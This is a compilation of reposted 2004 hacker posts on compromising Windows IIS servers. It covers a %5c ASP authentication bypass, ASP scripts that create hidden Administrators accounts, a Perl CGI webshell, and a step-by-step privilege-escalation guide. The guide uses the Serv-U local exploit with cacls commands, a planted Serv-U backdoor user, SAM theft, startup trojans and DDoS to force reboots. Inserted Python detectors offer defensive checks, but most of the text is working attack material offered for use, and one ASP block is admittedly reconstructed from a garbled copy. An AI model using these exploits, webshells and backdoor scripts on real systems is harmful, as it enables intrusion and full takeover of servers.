On Privilege Escalation with ASP Trojans [Compilation]

xiaoxiao2021-03-06  15

Some years ago this vulnerability could be used for directory traversal. Microsoft released a patch, but the patch seems only to restrict IIS to the virtual directory, so the vulnerability still exists, just with limited reach, and only on IIS: submit a URL containing %5c and the requested file is still found, but the files it references cannot be found (%5c is the URL encoding of the backslash; IIS jumps up to the parent directory, where of course they cannot be found; dizzy yet? haha, I am).

Later the experts dug further into this vulnerability and came up with the legendary %5c database-path disclosure trick: because the file references its database by a relative path, after submitting %5c the database cannot be found, and IIS obediently reports the path of the database (don't follow? look it up on Google).

By chance I found that %5c can also be used to bypass ASP authentication; try it when the database-path trick fails.

Enough chatter, look at the following code:

```asp
<%
Guest_User = Trim(Request("Guest_User"))
Guest_Password = Trim(Request("Guest_Password"))
Set RS = Server.CreateObject("ADODB.Recordset")
SQL = "SELECT * FROM admin WHERE id = 1"
RS.Open SQL, Conn, 3, 2
ReadUser = RS("Guest_User")
ReadPassword = RS("Guest_Password")
If ReadUser <> Guest_User Or ReadPassword <> Guest_Password Then
    Response.Write "Please enter the correct administrator password!"
    Response.End
Else
    Session("admin") = 1    ' after logging in, record it in the session
    Response.Write("Login successful, please return to the message page")
End If
%>
```

See? To pass the check, the username and password you submit must match those in the database. So what? Let's look at the code of the database connection file:

```asp
<%
On Error Resume Next
Set Conn = Server.CreateObject("ADODB.Connection")
DBPath = Server.MapPath("Guestbook.asp")
Conn.Open "Driver={Microsoft Access Driver (*.mdb)};DBQ=" & DBPath
%>
```

Aha, an error-suppressing statement; what a treasure! Think about it: if you submit %5c the database cannot be found, but because of the error handling the program keeps running, so the username and password it reads from the database are empty (which is why the database-path trick sometimes just shows an empty page: the data is empty). Haha, so we bypass the check!

Knowing how it works, the rest is easy: save the login page locally, modify the URL it submits to, changing the last "/" to "%5c", put a space in the username and password fields (some programs check whether the username and password are empty, and the space gets filtered out by the program), submit, OK. Hey, don't think I have no real code to write about: this is in fact a message-board program written by our school, hanging right on the school's home page, heh heh.

Having understood the principle, of course I had to look for real vulnerabilities, and naturally I started with the famous Dongwang forum. But that failed, because it has this passage:

```asp
If Err Then
    Err.Clear
    Set Conn = Nothing
    Response.Write "Database connection error, please check the connection string."
    Response.End
End If
```

When the database is not found it just stops; heh heh, a false hope.

Then I downloaded the BBSXP forum and opened its database connection file. Halo, there is no error-handling statement at all; heh, but it can at least be used for the database-path trick.

I'm not that obsessive, so I did not look any further; I'll write this up and leave the rest to you masters.

To summarize, the conditions for this attack method:
1. The database connection uses a relative path and has only a simple error-handling statement;
2. The server's IIS version is 4 or 5;
3. The program does not check for empty input, or it checks but filters spaces, filtering spaces during the comparison;
4. The program cannot be in the first class.

As for prevention, heh, since the attack conditions are known, the countermeasures follow naturally ^_^
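A defender-side counterpart to the conditions listed above, added here as an example and not code from the original post: it parses IIS W3C extended log lines (a constructed sample using the standard field names) and flags requests whose path carries a backslash, either raw or percent-encoded as %5c, which is the marker of the trick this post describes. The function names and the sample lines are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample of an IIS W3C extended log (not real traffic); the
# #Fields header names the columns, as IIS writes it.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-12-25 19:57:36 10.0.0.5 GET /guestbook/login.asp - 200
2004-12-25 19:57:40 10.0.0.5 POST /guestbook%5clogin.asp - 200
2004-12-25 19:57:41 10.0.0.7 GET /guestbook/%5Cconn.asp - 500
2004-12-25 19:58:02 10.0.0.9 GET /images/logo.gif - 200
"""

ENCODED_BACKSLASH = re.compile(r"%5c", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line; a real tool would count these
        yield dict(zip(fields, parts))


def has_backslash(stem, query="-"):
    """True if the request path contains a backslash, raw or percent-encoded.

    IIS may log the stem as received or already decoded, so both forms are
    checked; decoding is done once (no double-decode) to avoid masking.
    """
    raw = stem if query in ("", "-") else stem + "?" + query
    return bool(ENCODED_BACKSLASH.search(raw)) or "\\" in unquote(raw)


def find_backslash_requests(text):
    """Return (client ip, uri stem, status) for every flagged request."""
    return [
        (e["c-ip"], e["cs-uri-stem"], e["sc-status"])
        for e in parse_w3c(text)
        if has_backslash(e["cs-uri-stem"], e.get("cs-uri-query", "-"))
    ]


if __name__ == "__main__":
    for hit in find_backslash_requests(SAMPLE_LOG):
        print("backslash in request path:", hit)
```

The check looks only at the path; the bypass in this post also submits blank-looking credentials, which a web log does not record, so pair it with application-side logging of failed and suspicious logins.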

-- Author: vjoy -- Published: 2004-12-25 19:57:36 -- ASP code to add a superuser [originally by Blue Screen, improved by Kevin, an unpublished MS vulnerability]

Author: Blue Screen, Kevin. Article source: Ice Point Limit

In fact I tested this on my own broiler and on Kevin's, as well as on Hippo Epic's. The result was that a user was successfully added to the Administrators group from User permissions (although I can't believe my eyes). Last time Kevin said nothing, so I did not dare to release it... Now that I have seen it on his blog, back it comes (I improved it a little compared with my last test, adding a form). Everyone is in luck. The code is right, but very few succeed; it depends on luck. Oh, next I want to integrate it into Ocean. Hehe.

WScript.Network object script privilege escalation vulnerability exploitation tool

```asp
User: <br> Password:
<%@ codepage=936 %>
<%
On Error Resume Next
' the request-handling prologue below is reconstructed from a garbled copy
If Request.ServerVariables("Remote_Addr") <> "127.0.0.1" Then
    Response.Write "IP !s N0t Right"
Else
    If Request("UserName") <> "" Then
        UserName = Request("UserName")
        Passwd = Request("Passwd")
        Response.Expires = 0
        Session.Timeout = 50
        Server.ScriptTimeout = 3000
        Set lp = Server.CreateObject("WScript.Network")
        oz = "WinNT://" & lp.ComputerName
        Set ob = GetObject(oz)
        Set oe = GetObject(oz & "/Administrators,group")
        Set od = ob.Create("User", UserName)
        od.SetPassword Passwd
        od.SetInfo
        oe.Add oz & "/" & UserName
        If Err Then
            Response.Write "~~ Don't buy the 6+1 lottery today ... spend 2 yuan on a bottle of something and be happy ..."
        Else
            If InStr(Server.CreateObject("WScript.Shell").Exec("cmd.exe /c net user " & UserName).StdOut.ReadAll, "Last Login") > 0 Then
                Response.Write "Although there was no error, it seems the account was not created. You must be very depressed."
            Else
                Response.Write "OMG! " & UserName & " account really was created! This is an unknown vulnerability. 5,000,000 RMB is yours"
            End If
        End If
    Else
        Response.Write "Please enter the user name"
    End If
End If
%>
```

-- Author: vjoy -- Published: 2004-12-25 19:58:10 -- Ultimate privilege-escalation techniques

Author: WekweN

http://www.wrsky.com

This article combines the escalation techniques of many masters with some ideas of my own.

When we get a WebShell, the next thing to do is escalate privileges.

My personal summary is as follows:

1. C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere. If you can jump to this directory, that is the best case: download the .CIF file in it, get the pcAnywhere password, and log in. PS: cracking tools are available, find them yourself!

2. C:\WinNT\System32\Config. If you can get here, download the SAM and crack the users' passwords. Software for cracking SAM passwords: LC, SAMInside.

3. C:\Documents and Settings\All Users\Start Menu\Programs. If you can jump here, you can get a lot of useful information. You will see many shortcuts; we generally pick Serv-U, view the shortcut's properties locally to learn its path, and see whether you can jump there. Once in, if you have permission to modify ServUDaemon.ini, add a user with an empty password:

```ini
[USER=wekwen|1]
Password=
HomeDir=C:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=D:\|RWAMELCDP
Access1=F:\|RWAMELCDP
SKEYValues=
```

This user has the highest privileges; then we can FTP in and use "quote site exec xxx" to escalate.
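An audit of ServUDaemon.ini for the conditions the entry above abuses, added here as an example and not part of the original post: it parses the [USER=...] sections of a constructed ini text (the key names follow those shown above) and reports users with an empty password, the System maintenance privilege, or write rights on a drive root. The parser, the function names and the sample file are my own; Serv-U's real file has many more keys than are handled here.

```python
import re

# Constructed ServUDaemon.ini fragment (not a real server's file): one
# ordinary account and one planted the way the post above describes.
SAMPLE_INI = """\
[GLOBAL]
Version=5.2.0.0

[USER=ftpuser|1]
Password=xy0123456789abcdef0123456789abcdef
HomeDir=D:\\ftp\\pub
Access1=D:\\ftp\\pub|RL

[USER=wekwen|1]
Password=
HomeDir=C:\\
TimeOut=600
Maintenance=System
Access1=C:\\|RWAMELCDP
Access1=D:\\|RWAMELCDP
Access1=F:\\|RWAMELCDP
SKEYValues=
"""

USER_SECTION = re.compile(r"^\[USER=([^|\]]+)(?:\|\d+)?\]$", re.IGNORECASE)
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")


def parse_servu_users(text):
    """Map user name -> ordered list of (key, value) pairs from its section.

    Duplicate keys (several Access1 lines, as in the post) are kept, which
    is why a list is used instead of a dict or configparser.
    """
    users = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            m = USER_SECTION.match(line)
            current = m.group(1) if m else None
            if current is not None:
                users.setdefault(current, [])
            continue
        if current is not None and "=" in line:
            key, _, value = line.partition("=")
            users[current].append((key.strip(), value.strip()))
    return users


def audit_servu(text):
    """Return (user, finding) tuples for the risky settings described above."""
    findings = []
    for user, entries in parse_servu_users(text).items():
        for key, value in entries:
            k = key.lower()
            if k == "password" and value == "":
                findings.append((user, "empty password"))
            elif k == "maintenance" and value.lower() == "system":
                findings.append((user, "system maintenance privilege"))
            elif k.startswith("access") and "|" in value:
                path, rights = value.split("|", 1)
                if DRIVE_ROOT.match(path) and "W" in rights.upper():
                    findings.append((user, "write access on drive root " + path))
    return findings


if __name__ == "__main__":
    for user, finding in audit_servu(SAMPLE_INI):
        print(f"{user}: {finding}")
```

Because the post's whole technique depends on the ini file being writable from the web server's account, the file's NTFS permissions are the first thing to check; this audit catches an entry that has already been planted.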

4. C:\WinNT\System32\inetsrv\Data. This directory is likewise writable by Everyone; what we do is upload the privilege-escalation tool there, then execute it.

5. See whether you can jump to the following directories:

C:\PHP, use phpspy.

C:\Perl (it is not always this directory; you can also learn it from the shortcut properties), a WebShell in CGI:

```perl
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /g;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "<html><pre>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect stderr";
system($execthis);
syswrite(STDOUT, "</pre></html>\r\n\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
```

Save it as .cgi and execute it.

If that doesn't work, try the .pl extension: rename the .cgi file you just made to .pl and submit

http://anyhost/cmd.pl?dir

If it displays "Access denied", it can be executed! Submit right away. First upload su.exe (the Serv-U privilege-escalation exploit) to Perl's bin directory:

http://anyhost/cmd.pl?c:\perl\bin\su.exe

It returns:

Serv-U >3.x local exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

This is now running with IUSR permissions; submit:

http://anyhost/cmd.pl?c:\perl\bin\su.exe "cacls.exe C: /E /T /G Everyone:F"
http://anyhost/cmd.pl?c:\perl\bin\su.exe "cacls.exe D: /E /T /G Everyone:F"
http://anyhost/cmd.pl?c:\perl\bin\su.exe "cacls.exe E: /E /T /G Everyone:F"
http://anyhost/cmd.pl?c:\perl\bin\su.exe "cacls.exe F: /E /T /G Everyone:F"

If the following information is returned, it succeeded.

```text
Serv-U >3.x local exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
****************************************************************
>PASS #l@ * * @p
<230 User logged in, proceed.
****************************************************************
>SITE MAINTENANCE
****************************************************************
Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
****************************************************************
Domain xl:2 created
Creating Evil User
<200-User=xl
200 User settings saved
****************************************************************
[ ] Now Exploiting...
>USER xl
<331 User name okay, need password.
****************************************************************
>PASS 111111
<230 User logged in, proceed.
****************************************************************
[ ] Now Executing: cacls.exe C: /E /T /G Everyone:F
<220 Domain deleted
```

With that, all partitions are fully controlled by Everyone.

Now we promote our user to administrator:

http://anyhost/cmd.pl?c:\perl\bin\su.exe "net localgroup administrators IUSR_anyhost /add"

6. If you can successfully run "cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/InProcessIsapiApps", you can use it to escalate. Running

cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/InProcessIsapiApps

shows the DLL files that run in-process with privilege: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

Add asp.dll to this privileged list. asp.dll lives at c:\winnt\system32\inetsrv\asp.dll (the location is not necessarily the same on every machine).

Now we run

cscript adsutil.vbs set /w3svc/InProcessIsapiApps "C:\winnt\system32\idq.dll" "C:\winnt\system32\inetsrv\httpext.dll" "C:\winnt\system32\inetsrv\httpodbc.dll" "C:\winnt\system32\inetsrv\ssinc.dll" "C:\winnt\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"

You can use "cscript adsutil.vbs get /w3svc/InProcessIsapiApps" to check whether it has been added.
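A check for the change step 6 makes, added here as an example and not part of the original post: it extracts the quoted paths from the output of the adsutil.vbs get command above and reports any DLL that is not in the default in-process list quoted in the post, so a freshly added asp.dll shows up. The sample output is a constructed approximation of what adsutil.vbs prints for a LIST property, and the function names are my own.

```python
import re
from pathlib import PureWindowsPath

# The default in-process ISAPI DLLs named in the post above (file names only,
# since the directory differs between machines).
DEFAULT_INPROC = {"idq.dll", "httpext.dll", "httpodbc.dll", "ssinc.dll", "msw3prt.dll"}

# Constructed approximation of 'cscript adsutil.vbs get w3svc/InProcessIsapiApps'
# output after asp.dll has been appended; not captured from a real server.
SAMPLE_OUTPUT = """\
InProcessIsapiApps              : (LIST) (6 Items)
  "C:\\winnt\\system32\\idq.dll"
  "C:\\winnt\\system32\\inetsrv\\httpext.dll"
  "C:\\winnt\\system32\\inetsrv\\httpodbc.dll"
  "C:\\winnt\\system32\\inetsrv\\ssinc.dll"
  "C:\\winnt\\system32\\msw3prt.dll"
  "C:\\winnt\\system32\\inetsrv\\asp.dll"
"""

QUOTED = re.compile(r'"([^"]*)"')


def parse_inproc_list(output):
    """Return the quoted paths from adsutil.vbs LIST output, in order."""
    return [p for p in QUOTED.findall(output) if p]


def unexpected_inproc(output, allowed=DEFAULT_INPROC):
    """Return full paths whose file name is not in the allowed in-process set.

    Comparison is on the lower-cased file name, so the same DLL under a
    different system root still matches the allow list.
    """
    return [p for p in parse_inproc_list(output)
            if PureWindowsPath(p).name.lower() not in allowed]


if __name__ == "__main__":
    for path in unexpected_inproc(SAMPLE_OUTPUT):
        print("unexpected in-process ISAPI DLL:", path)
```

Anything the list reports matters because a DLL in InProcessIsapiApps is loaded into inetinfo.exe, which on IIS 5 runs as Local System; that is exactly why the post wants asp.dll there.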

7. You can also try this code to escalate, though the effect does not seem obvious:

```asp
<%@ codepage=936 %>
<%
Response.Expires = 0
On Error Resume Next
Session.Timeout = 50
Server.ScriptTimeout = 3000
Set lp = Server.CreateObject("WScript.Network")
oz = "WinNT://" & lp.ComputerName
Set ob = GetObject(oz)
Set oe = GetObject(oz & "/Administrators,group")
Set od = ob.Create("User", "wekwen$")
od.SetPassword "wekwen"    ' <----- password
od.SetInfo
Set of = GetObject(oz & "/wekwen$,user")
oe.Add(of.ADsPath)
Response.Write "wekwen$ super account created!"
%>
```

Check whether it worked with this code:

```asp
<%@ codepage=936 %>
<%
Response.Expires = 0
On Error Resume Next    ' list the accounts in the Administrators group
Set tn = Server.CreateObject("WScript.Network")
Set objGroup = GetObject("WinNT://" & tn.ComputerName & "/Administrators,group")
For Each admin In objGroup.Members
    Response.Write admin.Name & "<br>"
Next
If Err Then
    Response.Write "No: wscript.network"
End If
%>
```

8. C:\Program Files\Java Web Start. Here you can generally try a JSP WebShell; I hear its privileges are low, I have not encountered one myself.

9. Finally, if the host is locked down to a perverse degree, you can try writing a BAT, VBS or other trojan into C:\Documents and Settings\All Users\Start Menu\Programs\Startup.

Wait until the host restarts, or DDoS it to force a restart, to achieve the escalation.

In summary: find a directory that is both writable and executable, upload the escalation tool, then execute it. Three words: "find", "upload", "execute".

The above is my own summary; everyone has many methods, please share.

Wekwen

04.12.12

When reposting, please cite the original URL: https://www.9cbs.com/read-47939.html
